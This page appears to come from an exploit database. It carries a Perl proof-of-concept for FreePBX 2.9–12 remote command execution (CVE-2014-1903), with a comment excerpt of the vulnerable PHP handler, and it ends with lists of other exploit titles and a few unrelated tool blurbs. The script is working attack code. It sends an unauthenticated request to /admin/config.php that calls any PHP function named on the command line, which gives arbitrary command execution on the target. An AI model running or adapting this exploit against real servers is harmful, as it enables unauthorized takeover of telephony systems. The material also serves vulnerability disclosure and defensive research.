Menu

Search for hundreds of thousands of exploits

"FreePBX 2.11.0 - Remote Command Execution"

Author

Exploit author

@0x00string

Platform

Exploit platform

php

Release date

Exploit published date

2014-03-12

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution
# Google Dork: n/a
# Date: 2/25/14
# Exploit Author: @0x00string
# Vendor Homepage: http://www.freepbx.org/
# Software Link: http://mirror.freepbx.org/freepbx-2.11.0.tar.gz
# Version: 2.11 tested working
# Tested on: Ubuntu 12.04, 13.10
# CVE : CVE-2014-1903


#	References:
#	http://seclists.org/bugtraq/2014/Feb/42
#	http://issues.freepbx.org/browse/FREEPBX-7123
#	http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1903
#
#	Developer Advisory:
#	http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice



# in /admin/config.php
#	// handle special requests
#	if (!isset($no_auth) && isset($_REQUEST['handler'])) {
#		$module = isset($_REQUEST['module'])	? $_REQUEST['module']	: '';
#		$file 	= isset($_REQUEST['file'])		? $_REQUEST['file']		: '';
#		fileRequestHandler($_REQUEST['handler'], $module, $file);
#		exit();
#	}


# in /admin/library/view.functions.php
#	    case 'api':
#	      if (isset($_REQUEST['function']) && function_exists($_REQUEST['function'])) {
#	        $function = $_REQUEST['function'];
#	        $args = isset($_REQUEST['args'])?$_REQUEST['args']:'';
#	
#	        //currently works for one arg functions, eventually need to clean this up to except more args
#	        $result = $function($args);
#	        $jr = json_encode($result);
#	      } else {
#	        $jr = json_encode(null);
#	      }
#	      header("Content-type: application/json");
#	      echo $jr;
#	    break;


$| = 1;

my $sock = new IO::Socket::INET (
    PeerHost => $ARGV[0],
    PeerPort => '80',
    Proto => 'tcp',
);
die "$!\n" unless $sock;
my $func = $ARGV[1];
my $args = "";
my $i = 0;
my $max = 1;
foreach(@ARGV) {
	if ($i > 1) {
		$args .= $_;
	}
	unless($i > (scalar(@ARGV) - 2)) {
		$args .= "%20";
	}
	$i++;
}
my $payload = "display=A&handler=api&file=A&module=A&function=" . $func . "&args=" . $args;
chomp($payload);
print "payload is " . $payload . "\n";
my $packet = 	"GET http://" . $ARGV[0] . "/admin/config.php?" . $payload . "\r\n\r\n";
my $size = $sock->send($packet);
shutdown($sock, 1);
my $resp;
$sock->recv($resp, 1024);
print $resp . "\n";
$sock->close();
exit(0);
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2019-06-04 "NUUO NVRMini 2 3.9.1 - 'sscanf' Stack Overflow" remote hardware @0x00string
2019-06-04 "Cisco RV130W 1.0.3.44 - Remote Stack Overflow" remote hardware @0x00string
2017-02-14 "F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure" remote hardware @0x00string
2017-02-03 "CUPS < 2.0.3 - Remote Command Execution" remote linux @0x00string
2014-10-02 "GNU bash 4.3.11 - Environment Variable dhclient" remote linux @0x00string
2014-04-23 "HP Laser Jet - JavaScript Persistent Cross-Site Scripting via PJL Directory Traversal" webapps hardware @0x00string
2014-03-12 "FreePBX 2.11.0 - Remote Command Execution" webapps php @0x00string 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected